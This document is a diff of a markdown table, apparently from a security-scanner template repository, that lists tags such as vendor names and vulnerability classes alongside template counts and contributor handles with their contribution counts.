| 6 | sospiro | 1 | | | | | | | -| rat | 6 | null_hypothesis | 1 | | | | | | | -| microfocus | 6 | justmumu | 1 | | | | | | | -| advantech | 6 | ok_bye_now | 1 | | | | | | | -| servicenow | 6 | team syslifters / christoph | 1 | | | | | | | +| atom | 8 | maximus decimus | 2 | | | | | | | +| symantec | 8 | n-thumann | 2 | | | | | | | +| cisco-switch | 8 | ayadim | 2 | | | | | | | +| emerge | 8 | israel comazzetto dos reis | 2 | | | | | | | +| oauth | 8 | manas_harsh | 2 | | | | | | | +| unauthenticated | 8 | gevakun | 2 | | | | | | | +| huawei | 8 | nuk3s3c | 2 | | | | | | | +| mirai | 8 | rafaelwdornelas | 2 | | | | | | | +| osint-news | 8 | liwermor | 2 | | | | | | | +| error | 8 | ep1csage | 2 | | | | | | | +| wanhu | 8 | z0ne | 2 | | | | | | | +| go | 8 | clarkvoss | 2 | | | | | | | +| metadata | 8 | luci | 2 | | | | | | | +| default-page | 8 | 0xelkomy | 2 | | | | | | | +| ruckus | 7 | davidegirardi | 2 | | | | | | | +| monstra | 7 | uomogrande | 2 | | | | | | | +| keking | 7 | msegoviag | 2 | | | | | | | +| openemr | 7 | 8arthur | 2 | | | | | | | +| teamcity | 7 | dbrwsky | 2 | | | | | | | +| vpc | 7 | hackerarpan | 2 | | | | | | | +| filemanager | 7 | socketz | 2 | | | | | | | +| avtech | 7 | moritz nentwig | 2 | | | | | | | +| fpd | 7 | alex | 1 | | | | | | | +| nortekcontrol | 7 | rotembar | 1 | | | | | | | +| nacos | 7 | ipanda | 1 | | | | | | | +| fortios | 7 | dale clarke | 1 | | | | | | | +| database | 7 | caon | 1 | | | | | | | +| joomla\! | 7 | remi gascou (podalirius) | 1 | | | | | | | +| instrusive | 7 | dabla | 1 | | | | | | | +| car_rental_management_system_project | 7 | thebinitghimire | 1 | | | | | | | +| gogs | 7 | akash.c | 1 | | | | | | | +| squirrelmail | 7 | dmartyn | 1 | | | | | | | +| opensis | 7 | zinminphy0 | 1 | | | | | | | +| rfi | 7 | udinchan | 1 | | | | | | | +| oos | 7 | shivampand3y | 1 | | | | | | | +| activemq | 7 | carson chan | 1 | | | | | | | +| f5 | 7 | yashanand155 | 1 | | | | | | | +| bloofox | 7 | kareemse1im | 1 | | | | | | | +| vms | 7 | aresx | 1 | | | | | | | +| nagiosxi | 7 | kchason | 1 | | | | | | | +| contec | 7 | whynotke | 1 | | | | | | | +| mongodb | 7 | tirtha | 1 | | | | | | | +| blockchain | 7 | watchtowr | 1 | | | | | | | +| shopify | 7 | ap3r | 1 | | | | | | | +| pmb | 7 | ptonewreckin | 1 | | | | | | | +| moodating | 7 | gboddin | 1 | | | | | | | +| bigip | 7 | mayankpandey01 | 1 | | | | | | | +| mobileiron | 7 | adilsoybali | 1 | | | | | | | +| landray | 7 | official_blackhat13 | 1 | | | | | | | +| nexus | 7 | j3ssie/geraldino2 | 1 | | | | | | | +| slack | 7 | zandros0 | 1 | | | | | | | +| twitter | 7 | shreyapohekar | 1 | | | | | | | +| exploitdb | 7 | petruknisme | 1 | | | | | | | +| solarwinds | 7 | luskabol | 1 | | | | | | | +| telesquare | 7 | h4kux | 1 | | | | | | | +| linkedin | 7 | galoget | 1 | | | | | | | +| maps | 7 | p-l- | 1 | | | | | | | +| cacti | 7 | yaser_s | 1 | | | | | | | +| websphere | 7 | adnanekhan | 1 | | | | | | | +| flutterwave | 6 | ahmed abou-ela | 1 | | | | | | | +| gcp | 6 | b4uh0lz | 1 | | | | | | | +| cobbler | 6 | ohlinge | 1 | | | | | | | +| webmin | 6 | freakyclown | 1 | | | | | | | +| servicenow | 6 | 0xkayala | 1 | | | | | | | +| ldap | 6 | team syslifters / christoph | 1 | | | | | | | | | | mahrl | | | | | | | | -| chanjet | 6 | mabdullah22 | 1 | | | | | | | -| cockpit | 6 | k3rwin | 1 | | | | | | | -| paypal | 6 | whotwagner | 1 | | | | | | | -| flutterwave | 6 | amirmsafari | 1 | | | | | | | -| sonarqube | 6 | aayush vishnoi | 1 | | | | | | | -| zhiyuan | 6 | b0yd | 1 | | | | | | | -| jamf | 6 | realexp3rt | 1 | | | | | | | -| asus | 6 | jbertman | 1 | | | | | | | -| beyondtrust | 6 | sshell | 1 | | | | | | | -| express | 6 | infosecsanyam | 1 | | | | | | | -| splunk | 6 | nagli | 1 | | | | | | | -| microstrategy | 6 | sanineng | 1 | | | | | | | -| lfprojects | 6 | jaskaran | 1 | | | | | | | -| keycloak | 6 | nuts7 | 1 | | | | | | | -| sql | 6 | lbb | 1 | | | | | | | -| leak | 6 | udinchan | 1 | | | | | | | -| liferay | 6 | kailashbohara | 1 | | | | | | | -| kubelet | 6 | luqmaan hadia | 1 | | | | | | | -| tikiwiki | 6 | aaban solutions | 1 | | | | | | | -| minio | 6 | barthy.koeln | 1 | | | | | | | -| vrealize | 6 | matthew nickerson (b0than) @ | 1 | | | | | | | -| | | layer 8 security | | | | | | | | -| goanywhere | 5 | iampritam | 1 | | | | | | | -| ethereum | 5 | w0tx | 1 | | | | | | | -| paloaltonetworks | 5 | deena | 1 | | | | | | | -| chamilo | 5 | egemenkochisarli | 1 | | | | | | | -| cve2007 | 5 | flag007 | 1 | | | | | | | -| wbce | 5 | axrk | 1 | | | | | | | -| server | 5 | mohammad reza omrani | | 1 | | | | | | | -| | | @omranisecurity | | | | | | | | -| voip | 5 | phyr3wall | 1 | | | | | | | -| xmlrpc | 5 | byobin | 1 | | | | | | | -| vehicle_service_management_system_project | 5 | aron molnar | 1 | | | | | | | -| qnap | 5 | kishore krishna (sillydaddy) | 1 | | | | | | | -| cloudflare | 5 | orpheus | 1 | | | | | | | -| openai | 5 | izn0u | 1 | | | | | | | -| tibco | 5 | vulnspace | 1 | | | | | | | -| square | 5 | micha3lb3n | 1 | | | | | | | -| ldap | 5 | 8authur | 1 | | | | | | | -| akamai | 5 | aringo-bf | 1 | | | | | | | -| jabber | 5 | win3zz | 1 | | | | | | | -| thedigitalcraft | 5 | yiran | 1 | | | | | | | -| firmware | 5 | kurohost | 1 | | | | | | | -| sysaid | 5 | furkansenan | 1 | | | | | | | -| gateway | 5 | archer | 1 | | | | | | | -| fatpipe | 5 | alevsk | 1 | | | | | | | -| strapi | 5 | spac3wh1te | 1 | | | | | | | -| sentry | 5 | ahmed abou-ela | 1 | | | | | | | -| asana | 5 | lark lab | 1 | | | | | | | -| openemr | 5 | revblock | 1 | | | | | | | -| ems | 5 | petruknisme | 1 | | | | | | | -| storage | 5 | noah @thesubtlety | 1 | | | | | | | -| kkfileview | 5 | viniciuspereiras | 1 | | | | | | | -| cnvd2023 | 5 | ipanda | 1 | | | | | | | -| terramaster | 5 | ptonewreckin | 1 | | | | | | | -| schneider-electric | 5 | compr00t | 1 | | | | | | | -| magmi_project | 5 | _c0wb0y_ | 1 | | | | | | | -| parallels | 5 | unknown | 1 | | | | | | | -| rseenet | 5 | ratnadip gajbhiye | 1 | | | | | | | -| craftcms | 5 | phillipo | 1 | | | | | | | -| hpe | 5 | sickwell | 1 | | | | | | | -| redmine | 5 | jrolf | 1 | | | | | | | -| mssql | 5 | xeldax | 1 | | | | | | | -| connectwise | 5 | 0xteles | 1 | | | | | | | -| glpi-project | 5 | vzamanillo | 1 | | | | | | | -| genetechsolutions | 5 | palanichamy_perumal | 1 | | | | | | | -| percha | 5 | opencirt | 1 | | | | | | | -| nuuo | 5 | west-wise | 1 | | | | | | | -| graylog | 5 | chron0x | 1 | | | | | | | -| jupyter | 5 | higor melgaço | 1 | | | | | | | -| gocd | 5 | pry0cc | 1 | | | | | | | -| avideo | 5 | juliosmelo | 1 | | | | | | | -| zzzcms | 5 | dievus | 1 | | | | | | | -| totolink | 5 | sherlocksecurity | 1 | | | | | | | -| dionaea | 5 | shivampand3y | 1 | | | | | | | -| decision-center | 5 | yashanand155 | 1 | | | | | | | -| metinfo | 5 | jcockhren | 1 | | | | | | | -| apisix | 5 | xc1ym | 1 | | | | | | | -| 10web | 5 | ling | 1 | | | | | | | -| tenda | 5 | carlosvieira | 1 | | | | | | | -| acm | 5 | lingtren | 1 | | | | | | | -| circarlife | 5 | mihhailsokolov | 1 | | | | | | | -| adminer | 5 | arjunchandarana | 1 | | | | | | | -| resin | 5 | juicypotato1 | 1 | | | | | | | -| openstack | 5 | fopina | 1 | | | | | | | -| hybris | 5 | exid | 1 | | | | | | | -| web3 | 5 | amnotacat | 1 | | | | | | | -| papercut | 5 | osamahamad | 1 | | | | | | | -| mikrotik | 5 | ahmetpergamum | 1 | | | | | | | -| awstats | 5 | th3.d1p4k | 1 | | | | | | | -| avaya | 5 | retr02332 | 1 | | | | | | | -| pyload | 5 | ap3r | 1 | | | | | | | -| axigen | 5 | manuelbua | 1 | | | | | | | -| carrental | 5 | tirtha_mandal | 1 | | | | | | | -| sftp | 5 | mayankpandey01 | 1 | | | | | | | -| caucho | 5 | 0xtavian | 1 | | | | | | | -| circontrol | 5 | michael wedl | 1 | | | | | | | -| swagger | 5 | esonhugh | 1 | | | | | | | -| adb | 5 | amir-h-fallahi | 1 | | | | | | | -| webview | 5 | caon | 1 | | | | | | | -| react | 5 | 0xprial | 1 | | | | | | | -| bmc | 5 | mbmy | 1 | | | | | | | -| elementor | 5 | r3nz0 | 1 | | | | | | | -| agentejo | 5 | qlkwej | 1 | | | | | | | -| matrix | 5 | mubassirpatel | 1 | | | | | | | -| jwt | 5 | hakimkt | 1 | | | | | | | -| flickr | 4 | jbaines-r7 | 1 | | | | | | | -| metasploit | 4 | hyunsoo-ds | 1 | | | | | | | -| newstatpress_project | 4 | drfabiocastro | 1 | | | | | | | -| dotnet | 4 | aaron_costello | 1 | | | | | | | -| | | (@conspiracyproof) | | | | | | | | -| kentico | 4 | secthebit | 1 | | | | | | | -| phppgadmin | 4 | act1on3 | 1 | | | | | | | -| d-link | 4 | marcio mendes | 1 | | | | | | | -| roxy | 4 | cravaterouge | 1 | | | | | | | -| rabbitmq | 4 | notwhy | 1 | | | | | | | -| angular | 4 | push4d | 1 | | | | | | | -| gnuboard | 4 | thelicato | 1 | | | | | | | -| dolibarr | 4 | ldionmarcil | 1 | | | | | | | -| horde | 4 | h4kux | 1 | | | | | | | -| qdpm | 4 | daviey | 1 | | | | | | | -| powerjob | 4 | rojanrijal | 1 | | | | | | | -| kevinlab | 4 | smaranchand | 1 | | | | | | | -| easypost | 4 | petergrifin | 1 | | | | | | | -| reprisesoftware | 4 | th3r4id | 1 | | | | | | | -| photo | 4 | invisiblethreat | 1 | | | | | | | -| dropbear | 4 | gpiechnik2 | 1 | | | | | | | -| flatpress | 4 | irshadahamed | 1 | | | | | | | -| harbor | 4 | patrick pirker | 1 | | | | | | | -| eclipse | 4 | bugvsme | 1 | | | | | | | -| learnpress | 4 | d4ly | 1 | | | | | | | -| purchase_order_management_system_project | 4 | furkansayim | 1 | | | | | | | -| globalprotect | 4 | mayank_pandey01 | 1 | | | | | | | -| intelbras | 4 | ph33rr | 1 | | | | | | | -| thinkcmf | 4 | technicaljunkie | 1 | | | | | | | -| veronalabs | 4 | brabbit10 | 1 | | | | | | | -| dom | 4 | ransomsec | 1 | | | | | | | -| harmistechnology | 4 | omarkurt | 1 | | | | | | | -| webshell | 4 | tea | 1 | | | | | | | -| mailchimp | 4 | httpvoid | 1 | | | | | | | -| sound4 | 4 | vinit989 | 1 | | | | | | | -| bittrex | 4 | ynnirc | 1 | | | | | | | -| springcloud | 4 | mass0ma | 1 | | | | | | | -| igniterealtime | 4 | mesaglio | 1 | | | | | | | -| pip | 4 | alex | 1 | | | | | | | -| panos | 4 | millermedia | 1 | | | | | | | -| auieo | 4 | chesterblue | 1 | | | | | | | -| osint-archived | 4 | 5up3r541y4n | 1 | | | | | | | -| zend | 4 | sak1 | 1 | | | | | | | -| cve2005 | 4 | whynotke | 1 | | | | | | | -| dahuasecurity | 4 | shockwave | 1 | | | | | | | -| password | 4 | miroslavsotak | 1 | | | | | | | -| kyocera | 4 | sorrowx3 | 1 | | | | | | | -| figma | 4 | harshinsecurity | 1 | | | | | | | -| opencms | 4 | ilovebinbash | 1 | | | | | | | -| ebs | 4 | ky9oss | 1 | | | | | | | -| joomlamo | 4 | ayadi | 1 | | | | | | | -| bamboo | 4 | jacalynli | 1 | | | | | | | -| webkul | 4 | absshax | 1 | | | | | | | -| spark | 4 | adrianmf | 1 | | | | | | | -| mostracms | 4 | m0ck3d | 1 | | | | | | | -| wp-statistics | 4 | clment cruchet | 1 | | | | | | | -| puppet | 4 | blckraven | 1 | | | | | | | -| mantisbt | 4 | banana69 | 1 | | | | | | | -| wpdevart | 4 | 0xh7ml | 1 | | | | | | | -| royalevent | 4 | nielsing | 1 | | | | | | | -| pluginus | 4 | kba@sogeti_esec | 1 | | | | | | | -| jsf | 4 | alexrydzak | 1 | | | | | | | -| ampache | 4 | allenwest24 | 1 | | | | | | | -| linksys | 4 | tehtbl | 1 | | | | | | | -| bitrix | 4 | vikas kundu | 1 | | | | | | | -| candidats | 4 | p-l- | 1 | | | | | | | -| http | 4 | pratik khalane | 1 | | | | | | | -| metabase | 4 | jfbes | 1 | | | | | | | -| datadog | 4 | aaronchen0 | 1 | | | | | | | -| artifactory | 4 | failopen | 1 | | | | | | | -| pega | 4 | abbas.heybati | 1 | | | | | | | -| fit2cloud | 4 | sttlr | 1 | | | | | | | -| flink | 4 | anon-artist | 1 | | | | | | | -| httpserver | 4 | omarjezi | 1 | | | | | | | -| salesforce | 4 | x6263 | 1 | | | | | | | -| juniper | 4 | ivo palazzolo (@palaziv) | 1 | | | | | | | -| okta | 4 | pascalheidmann | 1 | | | | | | | -| prtg | 4 | shivanshkhari | 1 | | | | | | | -| confluent | 4 | couskito | 1 | | | | | | | -| hospital_management_system_project | 4 | booboohq | 1 | | | | | | | -| env | 4 | bywalks | 1 | | | | | | | -| consul | 4 | un-fmunozs | 1 | | | | | | | -| hongfan | 4 | cbadke | 1 | | | | | | | -| concrete | 4 | jeya seelan | 1 | | | | | | | -| audiocodes | 4 | 2rs3c | 1 | | | | | | | -| aria | 4 | xshuden | 1 | | | | | | | -| kingsoft | 4 | mukundbhuva | 1 | | | | | | | -| cnvd2019 | 4 | official_blackhat13 | 1 | | | | | | | -| hongdian | 4 | josecosta | 1 | | | | | | | -| sugarcrm | 4 | daffianfo | 1 | | | | | | | -| search | 4 | wpsec | 1 | | | | | | | -| terra-master | 4 | akash.c | 1 | | | | | | | -| pentaho | 4 | kiks7 | 1 | | | | | | | -| mcafee | 4 | ruppde | 1 | | | | | | | -| linkerd | 4 | mammad_rahimzada | 1 | | | | | | | -| httpd | 4 | nytr0gen | 1 | | | | | | | -| froxlor | 4 | akshansh | 1 | | | | | | | -| ternaria | 4 | tirtha | 1 | | | | | | | -| hoteldruid | 4 | screamy | 1 | | | | | | | -| nextjs | 4 | andysvints | 1 | | | | | | | -| linuxfoundation | 4 | jeya.seelan | 1 | | | | | | | -| seagate | 4 | w8ay | 1 | | | | | | | -| heroku | 4 | 0xceeb | 1 | | | | | | | -| djangoproject | 4 | s1r1us | 1 | | | | | | | -| aura | 4 | denandz | 1 | | | | | | | -| webmail | 4 | jna1 | 1 | | | | | | | -| jorani | 4 | t3l3machus | 1 | | | | | | | -| age-encryption | 4 | 1nf1n7y | 1 | | | | | | | -| arcgis | 4 | elouhi | 1 | | | | | | | -| phpjabber | 4 | godfatherorwa | 1 | | | | | | | -| rocketchat | 4 | lamscun | 1 | | | | | | | -| stripe | 4 | igibanez | 1 | | | | | | | -| shiro | 4 | soyelmago | 1 | | | | | | | -| mautic | 4 | nobody | 1 | | | | | | | -| osgeo | 4 | manikanta a.k.a @secureitmania | 1 | | | | | | | -| grav | 4 | manasmbellani | 1 | | | | | | | -| wcs | 4 | tangxiaofeng7 | 1 | | | | | | | -| pmb_project | 4 | ooooooo_q | 1 | | | | | | | -| os4ed | 4 | bartu utku sarp | 1 | | | | | | | -| rubyonrails | 4 | af001 | 1 | | | | | | | -| owncloud | 4 | becivells | 1 | | | | | | | -| casaos | 4 | metascan | 1 | | | | | | | -| openfire | 4 | 0xd0ff9 | 1 | | | | | | | -| codeigniter | 4 | oscarintherocks | 1 | | | | | | | -| mostra | 4 | intx0x80 | 1 | | | | | | | -| aspose | 4 | liquidsec | 1 | | | | | | | -| yeswiki | 4 | hotpot | 1 | | | | | | | -| centos | 4 | mordavid | 1 | | | | | | | -| articatech | 4 | am0nt31r0 | 1 | | | | | | | -| umbraco | 4 | noobexploiter | 1 | | | | | | | -| moveit | 4 | iphantasmic | 1 | | | | | | | -| tiki | 4 | hakluke | 1 | | | | | | | -| kibana | 4 | ndmalc | 1 | | | | | | | -| mitel | 4 | retr0 | 1 | | | | | | | -| panabit | 4 | sdcampbell | 1 | | | | | | | -| telegram | 4 | rotemreiss | 1 | | | | | | | -| newstatpress | 4 | 0h1in9e | 1 | | | | | | | -| metersphere | 4 | francescocarlucci | 1 | | | | | | | -| finicity | 4 | zeyad azima | 1 | | | | | | | -| nosqli | 4 | miguelsegoviagil | 1 | | | | | | | -| wireguard | 4 | momen eldawakhly | 1 | | | | | | | -| cnvd2022 | 4 | jaimin gondaliya | 1 | | | | | | | -| pie-register | 4 | regala_ | 1 | | | | | | | -| sendgrid | 4 | gboddin | 1 | | | | | | | -| pixie | 4 | savik | 1 | | | | | | | -| postmessage | 4 | luqman | 1 | | | | | | | -| jfrog | 4 | danigoland | 1 | | | | | | | -| digitaldruid | 4 | brianlam38 | 1 | | | | | | | -| churchcrm | 4 | berkdusunur | 1 | | | | | | | -| telerik | 4 | zhenwarx | 1 | | | | | | | -| jellyfin | 4 | hczdmr | 1 | | | | | | | -| zte | 4 | f1she3 | 1 | | | | | | | -| ray | 4 | myst7ic | 1 | | | | | | | -| info | 4 | guax1 | 1 | | | | | | | -| h3c | 4 | eremit4 | 1 | | | | | | | -| softwarepublico | 3 | ahmed sherif | 1 | | | | | | | -| rpm | 3 | willd96 | 1 | | | | | | | -| kfm | 3 | sid ahmed malaoui @ realistic | 1 | | | | | | | -| | | security | | | | | | | | -| epson | 3 | _darrenmartyn | 1 | | | | | | | -| securepoint | 3 | erethon | 1 | | | | | | | -| lansweeper | 3 | _harleo | 1 | | | | | | | -| truenas | 3 | dk999 | 1 | | | | | | | -| backdropcms | 3 | carson chan | 1 | | | | | | | -| mongo | 3 | lethargynavigator | 1 | | | | | | | -| r-seenet | 3 | djoevanka | 1 | | | | | | | -| loytec | 3 | mariam tariq | 1 | | | | | | | -| pulsar | 3 | rubina119 | 1 | | | | | | | -| 3cx | 3 | yashgoti | 1 | | | | | | | -| smuggling | 3 | xcapri | 1 | | | | | | | -| weiphp | 3 | ledoubletake | 1 | | | | | | | -| spip | 3 | pwnwithlove | 1 | | | | | | | -| particle | 3 | toufik-airane | 1 | | | | | | | -| glassfish | 3 | pdp | 1 | | | | | | | -| dev.pucit.edu.pk | 3 | floriandewald | 1 | | | | | | | -| learndash | 3 | luskabol | 1 | | | | | | | -| cpanel | 3 | kareemse1im | 1 | | | | | | | -| segment | 3 | lrtk-coder | 1 | | | | | | | -| finecms | 3 | elder tao | 1 | | | | | | | -| ghost | 3 | adamparsons | 1 | | | | | | | -| xerox | 3 | ramondunker | 1 | | | | | | | -| structurizr | 3 | jas37 | 1 | | | | | | | -| wordfence | 3 | shelld3v | 1 | | | | | | | -| webalizer | 3 | galoget | 1 | | | | | | | -| axis2 | 3 | makyotox | 1 | | | | | | | -| trendnet | 3 | elitebaz | 1 | | | | | | | -| checkpoint | 3 | schniggie | 1 | | | | | | | -| diagrams | 3 | prettyboyaaditya | 1 | | | | | | | -| ueditor | 3 | 0xcharan | 1 | | | | | | | -| buffalo | 3 | b0rn2r00t | 1 | | | | | | | -| lotus | 3 | remonsec | 1 | | | | | | | -| thefactory | 3 | charanrayudu | 1 | | | | | | | -| wwbn | 3 | borna nematzadeh | 1 | | | | | | | -| jeesns | 3 | naglis | 1 | | | | | | | -| mailgun | 3 | affix | 1 | | | | | | | -| magnolia | 3 | paper-pen | 1 | | | | | | | -| geowebserver | 3 | carrot2 | 1 | | | | | | | -| carel | 3 | shreyapohekar | 1 | | | | | | | -| telnet | 3 | piyushchhiroliya | 1 | | | | | | | -| netdata | 3 | b4uh0lz | 1 | | | | | | | -| axis | 3 | udyz | 1 | | | | | | | -| rancher | 3 | dwbzn | 1 | | | | | | | -| adiscon | 3 | fur1na | 1 | | | | | | | -| axway | 3 | jteles | 1 | | | | | | | -| instagram | 3 | mantissts | 1 | | | | | | | -| automattic | 3 | olewagner | 1 | | | | | | | -| gradle | 3 | miryangjung | 1 | | | | | | | -| actuator | 3 | bernardo rodrigues | 1 | | | | | | | +| paypal | 6 | rivalsec | 1 | | | | | | | +| asus | 6 | domenicoveneziano | 1 | | | | | | | +| zhiyuan | 6 | hlop | 1 | | | | | | | +| plesk | 6 | tea | 1 | | | | | | | +| geoserver | 6 | mr.bobo hp | 1 | | | | | | | +| doctor_appointment_system_project | 6 | smaranchand | 1 | | | | | | | +| microfocus | 6 | christbowel | 1 | | | | | | | +| elfinder | 6 | archer | 1 | | | | | | | +| 74cms | 6 | natto97 | 1 | | | | | | | +| couchdb | 6 | ling | 1 | | | | | | | +| chanjet | 6 | mchklt | 1 | | | | | | | +| magmi | 6 | twitter.com/dheerajmadhukar | 1 | | | | | | | +| cockpit | 6 | s1r1u5_ | 1 | | | | | | | +| openvpn | 6 | noamrathaus | 1 | | | | | | | +| jetty | 6 | retr0 | 1 | | | | | | | +| advantech | 6 | tim_koopmans | 1 | | | | | | | +| asp | 6 | shifacyclewla | 1 | | | | | | | +| synacor | 6 | banana69 | 1 | | | | | | | +| express | 6 | philippdelteil | 1 | | | | | | | +| keycloak | 6 | soyelmago | 1 | | | | | | | +| leak | 6 | f1she3 | 1 | | | | | | | +| liferay | 6 | w8ay | 1 | | | | | | | +| minio | 6 | ivo palazzolo (@palaziv) | 1 | | | | | | | +| rat | 6 | sttlr | 1 | | | | | | | +| jamf | 6 | ilovebinbash | 1 | | | | | | | +| kubelet | 6 | higor melgaço (eremit4) | 1 | | | | | | | +| lfprojects | 6 | booboohq | 1 | | | | | | | +| server | 6 | viondexd | 1 | | | | | | | +| sql | 6 | zhenwarx | 1 | | | | | | | +| bmc | 6 | regala_ | 1 | | | | | | | +| doctor-appointment-system | 6 | tehtbl | 1 | | | | | | | +| jeecg | 6 | lbb | 1 | | | | | | | +| log | 6 | youngpope | 1 | | | | | | | +| beyondtrust | 6 | 0ut0fb4nd | 1 | | | | | | | +| microstrategy | 6 | ratnadip gajbhiye | 1 | | | | | | | +| splunk | 6 | millermedia | 1 | | | | | | | +| vrealize | 6 | am0nt31r0 | 1 | | | | | | | +| tikiwiki | 6 | aravind | 1 | | | | | | | +| sonarqube | 6 | amirmsafari | 1 | | | | | | | +| typo3 | 6 | rinolock | 1 | | | | | | | +| nuuo | 5 | chesterblue | 1 | | | | | | | +| kkfileview | 5 | mlec | 1 | | | | | | | +| pyload | 5 | r3s ost | 1 | | | | | | | +| sentry | 5 | bughuntersurya | 1 | | | | | | | +| square | 5 | m0ck3d | 1 | | | | | | | +| carrental | 5 | aaronchen0 | 1 | | | | | | | +| genetechsolutions | 5 | dorkerdevil | 1 | | | | | | | +| goanywhere | 5 | furkansenan | 1 | | | | | | | +| redmine | 5 | wpsec | 1 | | | | | | | +| metinfo | 5 | unknown | 1 | | | | | | | +| chamilo | 5 | arall | 1 | | | | | | | +| react | 5 | xeldax | 1 | | | | | | | +| circarlife | 5 | knassar702 | 1 | | | | | | | +| percha | 5 | absshax | 1 | | | | | | | +| vehicle_service_management_system_project | 5 | aayush vishnoi | 1 | | | | | | | +| circontrol | 5 | affix | 1 | | | | | | | +| mikrotik | 5 | charanrayudu | 1 | | | | | | | +| papercut | 5 | _c0wb0y_ | 1 | | | | | | | +| awstats | 5 | d0rkerdevil | 1 | | | | | | | +| apisix | 5 | xstp | 1 | | | | | | | +| matrix | 5 | mammad_rahimzada | 1 | | | | | | | +| open-emr | 5 | elitebaz | 1 | | | | | | | +| rseenet | 5 | harryha | 1 | | | | | | | +| cnvd2023 | 5 | lark lab | 1 | | | | | | | +| hpe | 5 | hakimkt | 1 | | | | | | | +| xmlrpc | 5 | jub0bs | 1 | | | | | | | +| tenda | 5 | aringo-bf | 1 | | | | | | | +| voip | 5 | tangxiaofeng7 | 1 | | | | | | | +| parallels | 5 | brianlam38 | 1 | | | | | | | +| graylog | 5 | dwbzn | 1 | | | | | | | +| agentejo | 5 | iampritam | 1 | | | | | | | +| terramaster | 5 | 0xelkomy & c0nqr0r | 1 | | | | | | | +| tibco | 5 | manasmbellani | 1 | | | | | | | +| schneider-electric | 5 | clment cruchet | 1 | | | | | | | +| adminer | 5 | bernardo rodrigues | 1 | | | | | | | | | | @bernardofsr | | | | | | | | -| school_dormitory_management_system_project | 3 | thebinitghimire | 1 | | | | | | | -| etsy | 3 | droberson | 1 | | | | | | | -| watchguard | 3 | 0xrod | 1 | | | | | | | -| jitsi | 3 | notsoevilweasel | 1 | | | | | | | -| bigant | 3 | sicksec | 1 | | | | | | | -| messaging | 3 | queencitycyber | 1 | | | | | | | -| payara | 3 | unkl4b | 1 | | | | | | | -| superadmin | 3 | 0xelkomy & c0nqr0r | 1 | | | | | | | -| yii | 3 | patralos | 1 | | | | | | | -| airtable | 3 | arall | 1 | | | | | | | -| strangerstudios | 3 | higor melgaço (eremit4) | 1 | | | | | | | -| sharepoint | 3 | 0xparth | 1 | | | | | | | -| cluster | 3 | skylark-lab | 1 | | | | | | | -| osticket | 3 | pphuahua | 1 | | | | | | | -| nifi | 3 | topscoder | 1 | | | | | | | -| key | 3 | dale clarke | 1 | | | | | | | -| csrf | 3 | aravind | 1 | | | | | | | -| sony | 3 | co0nan | 1 | | | | | | | -| fastly | 3 | arr0way | 1 | | | | | | | -| dubbo | 3 | evolutionsec | 1 | | | | | | | -| fanruan | 3 | marcos_iaf | 1 | | | | | | | -| clusterengine | 3 | puben | 1 | | | | | | | -| intercom | 3 | kchason | 1 | | | | | | | -| openbmcs | 3 | ola456 | 1 | | | | | | | -| copyparty | 3 | sinsinology | 1 | | | | | | | -| dotcms | 3 | harryha | 1 | | | | | | | -| purchase-order-management-system | 3 | pussycat0 | 1 | | | | | | | -| sqlite | 3 | bad5ect0r | 1 | | | | | | | -| joomlacomponent.inetlanka | 3 | amanrawat | 1 | | | | | | | -| openwrt | 3 | d0rkerdevil | 1 | | | | | | | -| limesurvey | 3 | 0xceba | 1 | | | | | | | -| mapbox | 3 | natto97 | 1 | | | | | | | -| afterlogic | 3 | zn9988 | 1 | | | | | | | -| circleci | 3 | husain | 1 | | | | | | | -| modem | 3 | unp4ck | 1 | | | | | | | -| gvectors | 3 | rodnt | 1 | | | | | | | -| xxljob | 3 | chetgan | 1 | | | | | | | -| open-emr | 3 | dorkerdevil | 1 | | | | | | | -| inspur | 3 | ringo | 1 | | | | | | | -| trixbox | 3 | noamrathaus | 1 | | | | | | | -| phpipam | 3 | imhunterand | 1 | | | | | | | -| shell | 3 | unblvr1 | 1 | | | | | | | -| idrac | 3 | gonski | 1 | | | | | | | -| webnus | 3 | breno_css | 1 | | | | | | | -| sudo | 3 | sec_hawk | 1 | | | | | | | -| etcd | 3 | knassar702 | 1 | | | | | | | -| electron | 3 | zsusac | 1 | | | | | | | -| hsphere | 3 | william söderberg @ withsecure | 1 | | | | | | | -| nuget | 3 | akokonunes | 1 | | | | | | | -| emqx | 3 | matt miller | 1 | | | | | | | -| dokuwiki | 3 | ohlinge | 1 | | | | | | | -| credential | 3 | jub0bs | 1 | | | | | | | -| rubygems | 3 | andirrahmani1 | 1 | | | | | | | -| mythic | 3 | j3ssie/geraldino2 | 1 | | | | | | | -| clientid | 3 | s1r1u5_ | 1 | | | | | | | -| bitrix24 | 3 | bjxsec | 1 | | | | | | | -| cas | 3 | numan türle | 1 | | | | | | | -| e-mobile | 3 | freakyclown | 1 | | | | | | | -| octobercms | 3 | j33n1k4 | 1 | | | | | | | -| posh | 3 | mhdsamx | 1 | | | | | | | -| siemens | 3 | 0ut0fb4nd | 1 | | | | | | | -| imap | 3 | dawid-czarnecki | 1 | | | | | | | -| waf | 3 | watchtowr | 1 | | | | | | | -| openam | 3 | rinolock | 1 | | | | | | | -| dos | 3 | lady_bug | 1 | | | | | | | -| nuxtjs | 3 | undefl0w | 1 | | | | | | | -| proftpd | 3 | twitter.com/dheerajmadhukar | 1 | | | | | | | -| discourse | 3 | evan rubinstien | 1 | | | | | | | -| myeventon | 3 | hazana | 1 | | | | | | | -| switch | 3 | kiransau | 1 | | | | | | | -| droneci | 3 | kaizensecurity | 1 | | | | | | | -| revive | 3 | dali | 1 | | | | | | | -| supsystic | 3 | adnanekhan | 1 | | | | | | | -| influxdb | 3 | fq_hsu | 1 | | | | | | | -| superset | 3 | babybash | 1 | | | | | | | -| synology | 3 | christbowel | 1 | | | | | | | -| contentful | 3 | majidmc2 | 1 | | | | | | | -| kavita | 3 | hlop | 1 | | | | | | | -| favicon | 3 | danfaizer | 1 | | | | | | | -| saltstack | 3 | mlec | 1 | | | | | | | -| opencart | 3 | professorabhay | 1 | | | | | | | -| httpbin | 3 | bjhulst | 1 | | | | | | | -| drawio | 3 | exceed | 1 | | | | | | | -| woodwing | 3 | shiar | 1 | | | | | | | -| samba | 3 | arqsz | 1 | | | | | | | -| lighttpd | 3 | kresec | 1 | | | | | | | -| ninjaforms | 3 | rumble773 | 1 | | | | | | | -| nc | 3 | thirukrishnan | 1 | | | | | | | -| temenos | 3 | kabirsuda | 1 | | | | | | | -| tautulli | 3 | aresx | 1 | | | | | | | -| webcam | 3 | luciannitescu | 1 | | | | | | | -| movable | 3 | dmartyn | 1 | | | | | | | -| gnu | 3 | kagamigawa | 1 | 